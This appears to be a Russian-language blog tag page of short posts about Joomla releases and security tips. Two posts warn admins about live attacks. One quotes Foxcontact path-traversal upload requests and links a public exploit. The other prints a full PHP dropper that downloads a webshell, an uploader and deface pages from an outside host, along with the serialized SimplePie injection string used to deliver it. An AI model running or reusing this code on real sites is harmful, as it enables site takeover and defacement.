@Rumpelstilzchen

Тег joomla в блоге Rumpelstilzchen

Rumpelstilzchen

Очередной багфикс\дырозатыкательный релиз Жумлы 3.8.12.
Самое забавное в каждом таком релизе это очень частая вот такая строчка "affecting Joomla 1.5.0 through 3.8.11".
ОЛОЛО же, это не свежая уязвимость, это ДРЕВНЯЯ уязвимость которую только сейчас официально нашли. И сколько еще там подобных дыр?

Rumpelstilzchen

Вот обычно почему ругают Жумлу - потому что ломают, дефейсят и так далее. Причем далеко не всегда прчиина в том, что, сцука, обновляться же надо, а порой тупо пароль подбирают.
И сейчас я вот думаю - а ничего чтов ШТАТНОЙ поставке Жумлы имеется 2FA TOTP плагин? Почему никто не пользует?
Не поймите меня неправильно, я не фоннат таких методов, но ведь Жумла это такая весчь, что лишней бзопасности не помешает.
Стандартно, из коробки Жумла имеет поддержку GA (TOTP) и Yubikey, но можно поставить Akeeba Loginguard который добавляет кучу опций - код на мыло, фиксированный пароль, PushBullet, SMS (за ваши бабки), снова TOTP и yubikey и еще U2F. Webauthn нету пока.

Rumpelstilzchen

Обновление 3.8.4 вышло. Как обычно, мелкие уязвимости (в основном фигня вроде XSS) + обновления библиотек и борьба с глюками на Пых-пых 7.2

Rumpelstilzchen

Настало время обновлять Жумлу, Жумла не обновится сама. Впрочем дырок безопасности на этот раз нет, только совместимость с Пых 7.2 починили и еще по мелочи.

Rumpelstilzchen

C некоторых пор Жумла стыдливо прячет свою версию шоп скрипткиддисам было сложнее.
Однако, рукалицо, версию все еще легко посмотреть в домен/language/en-GB/en-GB.xml - отсюда вывод, закрывайте доступ, все равно эти файлы только для внутреннего пользования.

Rumpelstilzchen

А еще сейчас волна хакинга Джумлы через Foxcontact.
хакают так - "GET /components/com_foxcontact/lib/file-uploader.php?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 500 185 "-" "Mozilla/5.0"
(не работает, лол)
Или так - "GET /index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=2?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 200 491 "-" "Mozilla/5.0"
ссылочка на эксплойт - https://github.com/2inf3rna...ob/master/exploit.py
Проверьте себя. Загуржает в components/com_foxcontact/ файл _func.php - форму загрузки на сервер скриптов.
П.С. НЕ работает если загрузка аттачей в форме выключена.

Rumpelstilzchen

Опять кулхацкеры вылезли. Снова пытаются через SimplePie хакать.

Вот такой вот код выполнить хотят

"<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vip.php" ;
$text = http_get('http://kylebufis.com/vip/vip.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/tmp/upxx.php" ;
$text2 = http_get('http://kylebufis.com/vip/uploader.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/x.txt" ;
$text3 = http_get('http://kylebufis.com/vip/deface.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/tmp/check.php" ;
$text4 = http_get('http://kylebufis.com/vip/check.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/x.php" ;
$text5 = http_get('http://kylebufis.com/vip/deface.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('#');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

@unlink(FILE);

?>

Рекомендую почекаться в логах на "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:2934:\"eval"

Rumpelstilzchen

Если поставить на Джумлу плагин поддержи XML-RPC (http://www.joomler.net/down...x-updated-v207.html) и влючить плагин RSD (добавляет теги в страницу указывающие на XML-RPC endpoint), то всякие хакботы станут думать, что у нас стоит Wordpress и будут впустую ломиться по несуществующим адресам.
Для дополнительного удовольствия можно добавить в Жумлу некоторые характерные для Вротпреса файлы-заглушки (например wp-login.php), чтобы их точно запутать.

Rumpelstilzchen

Вышла 3.8.1 - вот теперь можно начинать тестировать :)

Rumpelstilzchen

Вышла новая 3.8.0 если кто не заметил. Из главных фишек - новый роутер, таки. Еще началась подготовка к переходу на платформу 4.Х которая будет весьма ограниченно совместима с нынешней.
Но спешите обновляться. Во первых, как обычно, первый релиз в серии глючный -может сломаться в процессе обновления.
Во вторых, роутер то впилил, но он "экспериментальный", по умолчанию не включен, а после включения "никто ничего не гарантирует".
Старые ссылки сломаются однозначно, прозрачного редиректа как обычно не сделали. Большинство сторонних компонентов не готово к новому роутеру вообще никак.
"старым" сайтам рекомендуют "тщательное тестирование", а новым - врубать сразу и есть мозг разработчикам компонентов. С учетом любви многих разработчиков "подзабить" на свои разработки....будет весело.
Впрочем новый роутер можно не включать - тогда вроде не так все страшно.

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.